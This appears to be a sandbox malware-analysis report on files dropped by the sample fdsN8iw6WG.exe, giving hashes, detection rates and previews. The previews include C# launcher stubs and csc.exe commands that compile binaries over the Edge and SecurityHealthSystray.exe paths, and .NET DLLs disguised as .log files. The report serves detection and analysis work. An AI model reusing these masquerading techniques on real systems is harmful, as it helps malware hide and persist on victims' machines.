MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcdixpv2.uns.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ryq3vxmq.oki.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0heos1j.43u.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzeota2v.du2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wylfqmjf.10h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5s2x1ud.no5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\diacazft\diacazft.0.cs

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	399
Entropy (8bit):	4.902070678462975
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6H+ViFkD:JNVQIbSfhWLzIiFkMSfhWH+cFkD
MD5:	2C4F20E8651170B580191735BC3A48D8
SHA1:	B75EE91D2181F226CC94809DEF1523F84677E8DA
SHA-256:	1D7635DCFE5F6B95CE28E672C2C2228428E5FC013A738624FCADA3348B9F7FF4
SHA-512:	B3B7D4D0E1FE4699605B907010D29E32246F5241CEAF6B45A68F4CE9EB66C6213601B168DEA88762BEC426CEDA3F46BA1056BD3FA0B15E53066F8DACA0BC93B4
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Microsoft\sihost.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	5.0591900097991545
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fbrR:Hu7L//TRRzscQyZ
MD5:	A76767067EFF7CA300E5273A85EFFF20
SHA1:	BC9499474C9F89E8CC53314C4D90426B0AD82906
SHA-256:	E0E885544F9A6FE34BA89115304DEAB3F4D6940BC707A07CB3A6679AD10E36F2
SHA-512:	79893D223971498D24F025876839459729B9395022612A843CED11A1457EE83192D78B2F2EE67C98C5F2C6EF76EAEB55CDF1BE702EFCA0745E007BBBE88BFAB0
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\diacazft\diacazft.0.cs"

C:\Users\user\AppData\Local\Temp\diacazft\diacazft.out

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
Category:	modified
Size (bytes):	767
Entropy (8bit):	5.228867488359442
Encrypted:	false
SSDEEP:	12:KMi/I/u7L//TRRzscQycKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/VRzstycKax5DqBVKVrdFAMBt
MD5:	2C8B1755768BD0BEB419DACCBFAB6618
SHA1:	119EA30C2A4ED60215CC0D0035B0FE9BEF5424DB
SHA-256:	4EC12C02396F9E322CC6188044016FE6D1D8062587D23F867D90E2528C5652FA
SHA-512:	81AD21FEF18524DE656EA1C547843FD79C9FE0651026C28A8B3EAB5877FD826E32FA21A4D4B5CD0E0079B577FA4E4EF09C3DD8EB6A1FC311836EAA5E5B175D2A
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\diacazft\diacazft.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.0.cs

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	384
Entropy (8bit):	4.870374924448412
Encrypted:	false
SSDEEP:	6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2/H+z7ViFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6s
MD5:	E6DD926B04F058A98E981E97D98B7614
SHA1:	3FEC5CECD16E8106160402A0E8C3EFDA2A924497
SHA-256:	06F73E3FCCC907D118B607851C5905FA5713FE23066813317EA431BC7E01B315
SHA-512:	DD9FE9FD2B4CE5D695E4FD37E06ED492B38FE9D7CCEF134FBEB1D367ABD8D05AD602F17C14D6CF9BC6DAF9DFFFBFCBD5A2D2BCF3FD7D7A44E33FB01FFAEFC796
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Microsoft\sihost.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.cmdline

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	251
Entropy (8bit):	5.123525844599363
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923foAn:Hu7L//TRq79cQyLn
MD5:	13781AA8B7A7C6B8A03C484C1D62B893
SHA1:	B1058CF128BDC32F8EA118A9EA11C2E1CC1F1074
SHA-256:	550E7A5BEB60D5EDA73F2343C4C7532D255DE8C454132ADD148E7515791816A5
SHA-512:	035B3F3DCFAFAD5772DC0B7535058FFEB5C6C76CFE92CB14396A7151A29413B5DE78543717CDAA5B0FCF5CF5E761F0CEABB74B8FEE024B553E5B2CC247BA0654
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.0.cs"

C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.out

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (331), with CRLF, CR line terminators
Category:	modified
Size (bytes):	752
Entropy (8bit):	5.261883999632037
Encrypted:	false
SSDEEP:	12:KMi/I/u7L//TRq79cQyLuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/Vq79tyKKax5DqBVKVrdFAMBt
MD5:	CB1672D4579C1863E3D9FACE67F7FE14
SHA1:	76BCA14446ADE79B627CA5904BAE17B4E9CECC71
SHA-256:	E236308820AC49E4CAA31316F25994EE3C38F63A93257C76883DAE777A6F49B3
SHA-512:	CC4FE98AB677818397301FF9978C6784690841C70639BB9079C610F85D85C0A2BF528D6BC3B4608C676EA0273BDD8DBC35A1509548B9E42880C2784B59F40226
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Desktop\1549a610452dc1

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	ASCII text, with very long lines (809), with no line terminators
Category:	dropped
Size (bytes):	809
Entropy (8bit):	5.886495862552798
Encrypted:	false
SSDEEP:	24:y8DQ5E9thscxWLgBUYt2MMxUFjkRHQ5ZMfWpoe:TQq9FFmlMnQRw5Kfkd
MD5:	9B8B8B847BA48B815FAEBAC56A5F2384
SHA1:	A981077C3EFB69B04F7ACD74014B71665E3AC08C
SHA-256:	351372E4D309BF7310C4A6B4DD6E4C6223B0E35B9C0B02CB1A2B85AED24B7428
SHA-512:	5DD6AEA7C90E3F7E8B28A9441EF4AB2490A238EA354EC1A2255241C2C72E6BD81A1860DEFC8BC112CD33768A19C8485BF887B240DB8B6E02D24F4993145C2AB6
Malicious:	false
Preview:	N8ZXlcueXXiuJXqWzlw9eumhkZcyoXYdiLowZfSNRP11EPT5Riu3jnTdW1xM95zA8EM7t37USisP2ucUGghGnf442LahsGOVZ129DVMXlakA4DkmYcFcYtXdJREhdZlMUWzB1dQuUKfM549zkxIPAv7pdY0wQo3LyXphNju5MUINOKiPRP6qQVMjZJhdmeepRTYhOblBCNDpmtbT0keArM5dLGIDBRTr0c65wBAzo5nDRg6psNmB9d7EX5WHThAv3WyJxfhzkoWwj2LoKcVxoRrXe1h1o2gG52J5rw2MqxbVGLffts70MMGmobo58qKrIQ1rsQ6XkIH0zWQTWCH55p3svgQQH6OAntMzTywdwjQDFPxRKVj5iOwdWI5M9qQn4GNGKa9iQoJVYznft8FwXTbY7tcL2kdGTnJ8BrHuVBp3EbFheZcAkdPkozIb7ypqKDBuppeC1VaWnhTfn5qdHdfzYiTMiqwhV9tBaU1z5aJPD27HgnxCIMiriLWGWReKj3AoySFTE1hrTPwflMq43uZJaBcP8ucn58qK1SSNid7Ro1XTY0eKljQze1OxzzVUY3vVilnT3cWZwHfioJ0HPSBVr1qADfYsIn2uGCuxMLQJN1CWVpIq9NEG1Znq5nQYDnRIPuclYD4EB2I0zUpYWrt4iw3qYD1j52Fkk3HlMhR6TAE9Rw1k81BV4Wjc1wMULUJJwiQ5NELzaxlis3ZmMRlD0upNTotaU6u804Ntg6X4qM5GvBu7XkI3tGTC2CliUufdCmrxqqFQ4rWnyicS4vDtx0PulK1dUyj5rbEIT

C:\Users\user\Desktop\FMuYuXzk.log

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.4346552043530165
Encrypted:	false
SSDEEP:	384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
MD5:	1DCDE09C6A8CE8F5179FB24D0C5A740D
SHA1:	1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
SHA-256:	1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
SHA-512:	5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 6%
Joe Sandbox View:	Filename: Q13mrh42kO.exe, Detection: malicious, Browse Filename: 84JufgBTrA.exe, Detection: malicious, Browse Filename: kIdT4m0aa4.exe, Detection: malicious, Browse Filename: BN57miasVe.exe, Detection: malicious, Browse Filename: YhyZwI1Upd.exe, Detection: malicious, Browse Filename: K61NUunFJv.exe, Detection: malicious, Browse Filename: webWin.exe, Detection: malicious, Browse Filename: W1nner client.exe, Detection: malicious, Browse Filename: XpADYjOsY5.exe, Detection: malicious, Browse Filename: SjA6nVF1ey.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PvOoeAES.log

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	5.570953308352568
Encrypted:	false
SSDEEP:	384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
MD5:	A4F19ADB89F8D88DBDF103878CF31608
SHA1:	46267F43F0188DFD3248C18F07A46448D909BF9B
SHA-256:	D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
SHA-512:	23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YehEOcJA.log

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\eWKdrIOo.log

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iMBUyFOh.log

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\nASSbBeV.log

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qcbjycVR.log

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2033664
Entropy (8bit):	7.574057459515473
Encrypted:	false
SSDEEP:	49152:t6Hwdqjo3Qo8D/30xTAprHEgLUabY1+oiPE:tHqQk/30tAVHLLLb6i
MD5:	6FB0F1B7E1E962C770EF34E605D1C4CE
SHA1:	A314D67A1383BA7042B9F5F1D513F4D9177DFF35
SHA-256:	32058AA91A7E956AE9B48F8EF08ED82C35063D4443D018369C45822DA3C9BA03
SHA-512:	2E74E56C7AEBBE4B6BDFD6F96DA72DB8C8B017FF1995151204B7CDDB09745A7A5B2C26C35B56E33FC32AE4D5373C197967AE5FF65EFD9809F520FBD55D1F3AE3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......D....................=..#........................................0..........(.... ........8........E........N...M...)...8....(.... ....~....{u...:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{h...9....& ....8y......0.......... ........8........E....J.......!...v.......8E......... ....8....r...ps....z~....:.... ....~....{....:....& ....8........~....(d...~....(h... ....?.... ....8q...~....(\... .... .... ....s....~....(`....... ....~....{....91..

C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\System32\CSC8295EB2BCC8D4700AEF6D1253A133871.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
